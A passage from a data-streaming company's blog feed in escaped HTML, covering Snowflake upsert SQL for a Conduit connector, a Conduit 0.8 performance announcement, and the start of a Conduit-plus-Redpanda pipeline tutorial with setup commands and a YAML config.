&lt;span class=&quot;token keyword&quot;&gt;MERGE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; mytable_final &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; a &lt;span class=&quot;token keyword&quot;&gt;USING&lt;/span&gt; mytable_temp &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; b &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id
			&lt;span class=&quot;token keyword&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;MATCHED&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;create&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;OR&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;UPDATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SET&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at
			&lt;span class=&quot;token keyword&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;MATCHED&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;create&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;OR&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt;  &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;VALUES&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Those above proved to be too slow, so we ended up going with this solution: uploading data in csv format, directly merging data from csv into the final table&lt;/p&gt;
&lt;p&gt;Sample Merge Query On New Records:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;MERGE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; my_table &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; a &lt;span class=&quot;token keyword&quot;&gt;USING&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;select&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt; meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;5&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;@file&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;file&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;csv&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;gz &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;FILE_FORMAT &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;  CSV_CONDUIT_SNOWFLAKE &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; b &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id
			&lt;span class=&quot;token keyword&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;MATCHED&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;create&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;OR&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;UPDATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SET&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;MATCHED&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;create&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;OR&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt;  &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;VALUES&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Also, to speed up the processing of data in our connector, we needed to split the stream of records (let&apos;s say we get 10k in one batch) into several chunks allowed us to use goroutines to parallelize the file generation + file uploading efforts when generating and writing to csv file.&lt;/p&gt;
&lt;p&gt;While Snowflake allows you to define primary keys, they don&apos;t enforce them. That&apos;s a huge issue as it can result in duplicates on the primary key to be inserted. But we’ve taken care of that with deduping during our merge and csv file generation (we check in both places). Since there are no duplicates in a batch, and we have compacted the records in-order (say, if you have CREATE, then UPDATE for a record). This eliminates the single batch ordering requirement.&lt;/p&gt;
&lt;p&gt;We also had to ensure that we were properly compressing and uploading files to not lose any data and that there isn’t an extensive wait time to upload.&lt;/p&gt;
&lt;h3&gt;Looking Ahead: Future Enhancements&lt;/h3&gt;
&lt;p&gt;The Snowflake Conduit Connector is a living project, with ongoing enhancements aimed at addressing the evolving needs of Snowflake users. We are committed to continuous improvement, drawing on user feedback and emerging data management trends to refine and expand the connector’s capabilities. The following list is just a few features that are on the horizon:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Multiple tables&lt;/li&gt;
&lt;li&gt;Performance/compression improvements&lt;/li&gt;
&lt;li&gt;Schema detection &amp;#x26; versioning&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;The Snowflake Conduit Connector is more than just a solution to a problem; it&apos;s a testament to the power of innovation in the face of technical limitations. By enabling real-time upserts and deletes, this connector not only enhances Snowflake&apos;s capabilities but also empowers data-driven companies to manage their data more effectively and efficiently. As we continue to develop and improve the Snowflake Conduit Connector, we look forward to unlocking even greater possibilities for our users, ensuring their data pipelines are as dynamic and robust as the insights they seek to derive.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.8 is here]]></title><description><![CDATA[Conduit 0.8 more than doubles single-pipeline performance.]]></description><link>https://meroxa.com/blog/conduit-0.8-is-here</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.8-is-here</guid><dc:creator><![CDATA[Simon Lawrence]]></dc:creator><pubDate>Wed, 15 Nov 2023 15:52:13 GMT</pubDate><content:encoded>&lt;p&gt;We’re happy to announce the latest release of Conduit. While previous releases of Conduit have focussed on particular features for this release we’ve made our focus performance. Our goal is to make Conduit the default tool for data movement and being able to handle workloads that demand high levels of throughput is critical to achieving that goal.&lt;/p&gt;
&lt;p&gt;We’re happy to report that we’ve been able to boost performance by over 2.5x to almost 70k msg/s through a single kafka-to-kafka pipeline. We achieved this performance increase with various improvements to the core of Conduit itself and to our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka/releases/tag/v0.7.0&quot;&gt;Kafka Connector&lt;/a&gt; as well.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Future work&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We’ve made great strides in improving Conduit’s performance but there are still additional improvements we’re eyeing. One of the most promising areas is micro-batching. With micro-batching N records are combined into a single record for processing and then split into N records again for writing to the destination. With this experimental batching work we’ve been able to push almost 250K msg/s through a single pipeline. This is really exciting and shows just how much more room the team has to improve performance.&lt;/p&gt;
&lt;p&gt;If you’d like to check it out the experimental work on micro-batching can be found in a &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka/tree/lovro/spike-microbatch&quot;&gt;branch&lt;/a&gt; in the Conduit repo.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We’d love your feedback!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As always, we’d love to hear from you. Post issues, share your thoughts in discussions or join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Check out the full release notes on the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.8.0&quot;&gt;Conduit Changelog&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time, Real Fast: Supercharging Data Pipelines with Conduit & Redpanda]]></title><description><![CDATA[Revamp your data pipelines with Conduit and Redpanda! Swap Kafka and Kafka Connect complexities for a swift, user-friendly options.]]></description><link>https://meroxa.com/blog/data-pipelines-conduit-redpanda</link><guid isPermaLink="false">https://meroxa.com/blog/data-pipelines-conduit-redpanda</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 06 Sep 2023 16:45:56 GMT</pubDate><content:encoded>&lt;p&gt;In today&apos;s rapidly evolving data landscape, achieving seamless data integration and high-performance stream processing has never been more critical. While Apache Kafka and Kafka Connect have long been the go-to solutions for many organizations, they often come with a steep learning curve and an intricate ecosystem that can slow down development cycles.&lt;/p&gt;
&lt;p&gt;Enter &lt;a href=&quot;https://conduit.io&quot;&gt;Conduit&lt;/a&gt; and &lt;a href=&quot;https://redpanda.com&quot;&gt;Redpanda&lt;/a&gt;: a match made in data streaming heaven. Conduit&apos;s intuitive, developer-friendly platform joins forces with Redpanda&apos;s lightning-fast, Kafka-compatible data streaming engine to offer an alternative that&apos;s not just easier to use, but also significantly outperforms traditional setups in terms of throughput and latency. From simplified configurations and resource-efficient architecture, the Conduit-Redpanda combo makes data integration and stream processing faster, smoother, and more scalable than ever before.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;The Pain Points of Kafka and Kafka Connect&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Navigating the world of Kafka and Kafka Connect often feels like walking through a maze of complexities. Right from the start, you&apos;re faced with a steep learning curve and intricate configurations, but that&apos;s just the tip of the iceberg. What&apos;s lurking below the surface are the real monsters: infrastructure and performance challenges. Setting up and maintaining a Kafka cluster requires not just expertise but also significant system resources. The platform&apos;s high CPU and memory consumption can put a strain on your infrastructure, causing performance bottlenecks that are tough to resolve.&lt;/p&gt;
&lt;p&gt;And while Kafka Connect brings the promise of simplifying data integration tasks, it comes with its own set of challenges that can quickly turn into downsides. One glaring issue is its intricate configuration process. Even simple integrations often require verbose and complex JSON configurations, making the initial setup a time-consuming affair. Additionally, Kafka Connect&apos;s scalability and performance don&apos;t always meet the mark, especially when handling large volumes of data. The system&apos;s resource consumption can escalate quickly, necessitating a beefy infrastructure to maintain optimal performance. This leads to added costs and complexity, eroding the supposed ease-of-use that Kafka Connect aims to offer.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Conduit + Redpanda: A Perfect Pairing&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Redpanda is a Kafka replacement written from the ground up in C++ and Conduit is a Kafka Connect replacement built in Go. Neither one of the platforms have dependencies on the JVM or Zookeeper to move data and are Kafka wire protocol compliant. Conduit&apos;s UI eliminates the need for verbose configurations, streamlining the data integration process. Additionally, Conduit has an already &lt;a href=&quot;https://conduit.io/docs/connectors/connector-list/&quot;&gt;established and growing list of open source connectors&lt;/a&gt; and a &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;Connector SDK&lt;/a&gt; with an accompanying suite of tests that enables you to write your own high-quality, performant custom connectors. Redpanda outperforms Kafka in terms of speed and latency while consuming fewer system resources. This allows for a more efficient utilization of hardware, reducing operational costs. Both tools are designed with a focus on developer experience, making it easier to set up, manage, and scale data streams. Together, Redpanda and Conduit provide a more performant, resource efficient, and developer friendly alternative to Kafka and Kafka Connect.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Getting Started&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To show you how easy it is to get started with Conduit and Redpanda, we’re going to build a simple pipeline that generates random information from a builtin Conduit connector into a Redpanda topic. Conduit will consume that information and output it into a file.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Conduit-Redpanda%20blog%20post_09062023_Image%201.png&quot; alt=&quot;Conduit-Redpanda blog post_09062023_Image 1&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Installation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Installing Conduit and Redpanda is pretty simple. Follow the step-by-step guides (&lt;a href=&quot;https://conduit.io/docs/introduction/getting-started/&quot;&gt;Conduit Guide&lt;/a&gt;,&lt;a href=&quot;https://docs.redpanda.com/current/get-started/quick-start/&quot;&gt;Redpanda Guide&lt;/a&gt;) to get your data streaming in no time. We’re going to use the Redpanda CLI, &lt;strong&gt;rpk&lt;/strong&gt;, to create topics, producers, and consumers. Follow the &lt;a href=&quot;https://docs.redpanda.com/current/get-started/rpk-install/&quot;&gt;instructions to download and install&lt;/a&gt; for your specific environment.&lt;/p&gt;
&lt;h3&gt;Running Redpanda and Creating a Topic&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Start the Redpanda cluster&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk container start &lt;span class=&quot;token parameter variable&quot;&gt;-n&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# creates a 3-node cluster&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Create a topic named &lt;code class=&quot;language-text&quot;&gt;conduit-demo&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk topic create conduit-demo &lt;span class=&quot;token comment&quot;&gt;# creates a topic&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;To test if everything is working open up a new terminal window(you should have two open right now). In the new window run:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk topic consume conduit-demo &lt;span class=&quot;token parameter variable&quot;&gt;--brokers&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker1_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;,&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker2_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;In the original window run the following command. Type text into the producer window as shown in the picture below&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;rpk topic produce conduit-demo &lt;span class=&quot;token parameter variable&quot;&gt;--brokers&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker1_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;,&lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt;broker2_addr&lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;..&lt;/span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You should see the following:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Conduit-Redpanda%20Blog%20Post_09062023_Image%202.png&quot; alt=&quot;Conduit-Redpanda Blog Post_09062023_Image 2&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Configuring and Running the Conduit Pipeline&lt;/h3&gt;
&lt;p&gt;You can build pipelines three ways with Conduit: &lt;a href=&quot;https://conduit.io/docs/features/ui&quot;&gt;built-in UI&lt;/a&gt;, &lt;a href=&quot;https://conduit.io/docs/features/api&quot;&gt;API&lt;/a&gt;, and using &lt;a href=&quot;https://conduit.io/docs/pipeline-configuration-files/getting-started&quot;&gt;pipelines configuration files&lt;/a&gt;. For this example, we’ll use the pipeline configuration files. For more detailed specs on all the configuration options for pipeline configuration, you can look at the &lt;a href=&quot;https://conduit.io/docs/pipeline-configuration-files/specifications&quot;&gt;docs&lt;/a&gt; and reference each of the specific connector configuration options in their &lt;a href=&quot;https://conduit.io/docs/connectors/connector-list&quot;&gt;respective Github repos&lt;/a&gt;.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a folder called &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt;&lt;/strong&gt; at the same level as your Conduit binary. Inside of that folder create a file named &lt;code class=&quot;language-text&quot;&gt;rand-rp-file.yml&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Copy the following code block into &lt;code class=&quot;language-text&quot;&gt;rand-rp-file.yml&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;version: 2.0  pipelines:    - id: randorpfile # Pipeline ID [required]      status: running # Pipeline status at startup (running or stopped)      description: random generator to file using redpanda      connectors: # List of connector configurations        - id: rando_src # Connector ID [required]          type: source # Connector type (source or destination) [required]          plugin: builtin:generator # Connector plugin [required]          settings: # A map of configuration keys and values for the plugin (specific to the chosen plugin)            format.type: raw # This property is specific to the generator plugin            format.options: &quot;id:int,email:string&quot; # This property is specific to the generator plugin        - id: rp_dest # [required]          type: destination # [required]          plugin: builtin:kafka # [required]          settings:            servers: &quot;&amp;lt;broker1_addr,broker2_addr,broker3_addr&gt;&quot; # [required]            topic: conduit-demo # [required]        - id: rp_src # [required]          type: source # [required]          plugin: builtin:kafka # [required]          settings:            servers: &quot;&amp;lt;broker1_addr,broker2_addr,broker3_addr&gt;&quot; # [required]            topic: conduit-demo # [required]        - id: file_dest # [required]          type: destination # [required]          plugin: builtin:file # [required]          settings:            path: ./output.txt # [required]&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Run the Conduit server from your terminal:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;./conduit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
